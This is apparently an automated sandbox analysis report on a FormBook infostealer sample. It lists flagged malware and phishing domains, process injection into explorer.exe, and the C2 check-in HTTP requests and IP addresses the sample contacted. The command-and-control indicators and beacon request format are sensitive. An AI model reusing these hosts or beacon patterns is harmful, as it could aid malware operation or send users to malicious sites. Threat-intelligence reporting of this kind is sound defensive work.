Antivirus detection for URL or domain

Source: http://www.candicrem.com/4hc5/	Avira URL Cloud: Label: malware
Source: http://www.tcbbuilds.com/4hc5/www.therealnikib.com	Avira URL Cloud: Label: malware
Source: http://www.vurporn.com	Avira URL Cloud: Label: malware
Source: http://www.7141999.com/4hc5/?P6=sJ+Ygj3voyzHV2SMJ+QMiTEgoYfBBcQbem66ypT0eUfc0EimMlq1mWlKocPRS2y/b4Gk&ntxh9=V48LzvX0	Avira URL Cloud: Label: malware
Source: http://www.lpqxmz.site/4hc5/?ntxh9=V48LzvX0&P6=245SFh9gPs7u7SMvCZq1WQwUtHwLu6OXJLdJjwoxg6CFn9y4LEhCSrC/ms6Ftk+AVu/2	Avira URL Cloud: Label: phishing
Source: http://www.quailrun-inc.com	Avira URL Cloud: Label: malware
Source: http://www.showshoe.info/4hc5/	Avira URL Cloud: Label: malware
Source: http://www.quailrun-inc.com/4hc5/	Avira URL Cloud: Label: malware
Source: http://www.bollywood.nexus	Avira URL Cloud: Label: malware
Source: http://www.modluxenwa.com	Avira URL Cloud: Label: malware
Source: http://www.therealnikib.com	Avira URL Cloud: Label: malware
Source: www.iqixuehe.com/4hc5/	Avira URL Cloud: Label: malware
Source: http://www.lpqxmz.site/4hc5/www.tcbbuilds.com	Avira URL Cloud: Label: phishing
Source: http://www.bollywood.nexus/4hc5/www.lpqxmz.site	Avira URL Cloud: Label: malware
Source: http://www.motionmixmedia.com/4hc5/www.castlegrouplt.com	Avira URL Cloud: Label: malware
Source: http://www.7141999.com	Avira URL Cloud: Label: malware
Source: http://www.7141999.com/4hc5/	Avira URL Cloud: Label: malware
Source: http://www.modluxenwa.com/4hc5/www.vurporn.com	Avira URL Cloud: Label: malware
Source: http://www.slotjitu88.website	Avira URL Cloud: Label: phishing
Source: http://www.iqixuehe.com/4hc5/www.candicrem.com	Avira URL Cloud: Label: malware
Source: http://www.therenixgroupllc.com/4hc5/www.7141999.com	Avira URL Cloud: Label: malware
Source: http://www.therealnikib.com/4hc5/	Avira URL Cloud: Label: malware
Source: http://www.therenixgroupllc.com/4hc5/?ntxh9=V48LzvX0&P6=qEWXZ3aqpcDZ/jSVREtayCI8W2IV6onyeM8faOppXvrhittFNUzvbhLP7PFzXYy9ta8e	Avira URL Cloud: Label: malware
Source: http://www.therealnikib.com/4hc5/www.slotjitu88.website	Avira URL Cloud: Label: malware
Source: http://www.vurporn.com/4hc5/	Avira URL Cloud: Label: malware
Source: http://www.vurporn.com/4hc5/www.motionmixmedia.com	Avira URL Cloud: Label: malware
Source: http://www.lpqxmz.site	Avira URL Cloud: Label: malware
Source: http://www.motionmixmedia.com/4hc5/	Avira URL Cloud: Label: malware
Source: http://www.pacersun.com	Avira URL Cloud: Label: malware
Source: http://www.7141999.com/4hc5/www.pacersun.com	Avira URL Cloud: Label: malware
Source: http://www.modluxenwa.com/4hc5/	Avira URL Cloud: Label: malware
Source: http://www.pacersun.com/4hc5/	Avira URL Cloud: Label: malware
Source: http://www.tcbbuilds.com	Avira URL Cloud: Label: malware
Source: http://www.pacersun.com/4hc5/www.showshoe.info	Avira URL Cloud: Label: malware
Source: http://www.candicrem.com/4hc5/www.therenixgroupllc.com	Avira URL Cloud: Label: malware
Source: http://www.iqixuehe.com/4hc5/?ntxh9=V48LzvX0&P6=+hA7uXL5jVPzGINsph1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkflq2ofsafzQv	Avira URL Cloud: Label: malware
Source: http://www.quailrun-inc.com/4hc5/www.bollywood.nexus	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: www.candicrem.com

Virustotal: Detection: 11%

Perma Link

Source: 881SP1exr1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 881SP1exr1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: chkdsk.pdbGCTL source: 881SP1exr1.exe, 00000002.00000002.1700042258.0000000000F88000.00000004.00000020.00020000.00000000.sdmp, 881SP1exr1.exe, 00000002.00000002.1699968102.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4088729224.0000000000330000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: chkdsk.pdb source: 881SP1exr1.exe, 00000002.00000002.1700042258.0000000000F88000.00000004.00000020.00020000.00000000.sdmp, 881SP1exr1.exe, 00000002.00000002.1699968102.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4088729224.0000000000330000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 881SP1exr1.exe, 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.1699296341.0000000005574000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.1701280255.0000000005722000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 881SP1exr1.exe, 881SP1exr1.exe, 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000004.00000003.1699296341.0000000005574000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.1701280255.0000000005722000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: CgWC.pdbSHA256 source: 881SP1exr1.exe
Source:	Binary string: CgWC.pdb source: 881SP1exr1.exe

Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 4x nop then pop ebx		2_2_00407B1C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop ebx		4_2_05047B1C

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 34.68.234.4 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.205.127.201 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.86.64.96 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.19 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.64.97.60 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.120.80.111 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 167.172.228.26 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.34.228.191 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 13.32.208.72 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49743 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49747 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49748 -> 103.120.80.111:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49749 -> 13.32.208.72:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49750 -> 45.64.97.60:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49751 -> 154.205.127.201:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49752 -> 199.34.228.191:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49753 -> 34.68.234.4:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49754 -> 154.86.64.96:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49755 -> 167.172.228.26:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.iqixuehe.com/4hc5/

Source: Joe Sandbox View	ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
Source: Joe Sandbox View	ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK

Source: global traffic	HTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=/VQHqX0ksQJGmUtuF+SmenrWXhlVL4nIAkrjzD1bv3XMK1Eb428apYspiXxzNiZFnR1c HTTP/1.1Host: www.quailrun-inc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?P6=aEvA5DdolFnSpG3wqqUvIRZQPhFuP/nqnfvGSsdAIfGqv2pNtxEQnoAbm37B6N+rsMpI&ntxh9=V48LzvX0 HTTP/1.1Host: www.bollywood.nexusConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=245SFh9gPs7u7SMvCZq1WQwUtHwLu6OXJLdJjwoxg6CFn9y4LEhCSrC/ms6Ftk+AVu/2 HTTP/1.1Host: www.lpqxmz.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=ZsWAow+yf8BBfalQduY7CMj5L6CLJOwgwJ6AETMAgkoaDSvJRnGnN78buAKwp8K6m6Gx HTTP/1.1Host: www.therealnikib.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?P6=Td1U1SjQUadfC3cbiTsqgzapHPyB/huuK+NgSE3DJAe+OSZ8lo2ZhtJstkIbAvBbRddo&ntxh9=V48LzvX0 HTTP/1.1Host: www.slotjitu88.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=+hA7uXL5jVPzGINsph1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkflq2ofsafzQv HTTP/1.1Host: www.iqixuehe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?P6=tOmE+Tzzb7HQLc2SkeB2EXcbcJrVSgBrP2Nr0WPSkAyRu+Yjx9aruD7HNlgfCbohliLP&ntxh9=V48LzvX0 HTTP/1.1Host: www.candicrem.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=qEWXZ3aqpcDZ/jSVREtayCI8W2IV6onyeM8faOppXvrhittFNUzvbhLP7PFzXYy9ta8e HTTP/1.1Host: www.therenixgroupllc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?P6=sJ+Ygj3voyzHV2SMJ+QMiTEgoYfBBcQbem66ypT0eUfc0EimMlq1mWlKocPRS2y/b4Gk&ntxh9=V48LzvX0 HTTP/1.1Host: www.7141999.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=YIoXQxIAORK6HEHBIjyMxPOX2glibAcKMS7MvCp7xLT7Ek+j4imqU/IlDY2a3gBqxYgb HTTP/1.1Host: www.pacersun.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 154.205.127.201 154.205.127.201
Source: Joe Sandbox View	IP Address: 167.172.228.26 167.172.228.26

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Oct 2023 07:50:22 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: explorer.exe, 00000003.00000002.4094650297.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421243113.0000000009843000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106023617.0000000009843000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000003.00000002.4094650297.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421243113.0000000009843000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106023617.0000000009843000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000003.00000002.4094650297.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421243113.0000000009843000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106023617.0000000009843000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)
Source: explorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)
Source: explorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://img.sedoparking.com
Source: explorer.exe, 00000003.00000002.4094650297.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421243113.0000000009843000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106023617.0000000009843000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000003.00000000.1648506599.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000003.00000000.1650112973.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1652947131.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4093617722.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.7141999.com
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.7141999.com/4hc5/
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.7141999.com/4hc5/www.pacersun.com
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.7141999.comReferer:
Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000003.3105919399.000000000C9AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105163433.000000000C999000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105077677.000000000C970000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bollywood.nexus
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bollywood.nexus/4hc5/
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bollywood.nexus/4hc5/www.lpqxmz.site
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bollywood.nexusReferer:
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.candicrem.com
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.candicrem.com/4hc5/
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.candicrem.com/4hc5/www.therenixgroupllc.com
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.candicrem.comReferer:
Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.castlegrouplt.com
Source: explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.castlegrouplt.com/4hc5/
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.castlegrouplt.comReferer:
Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
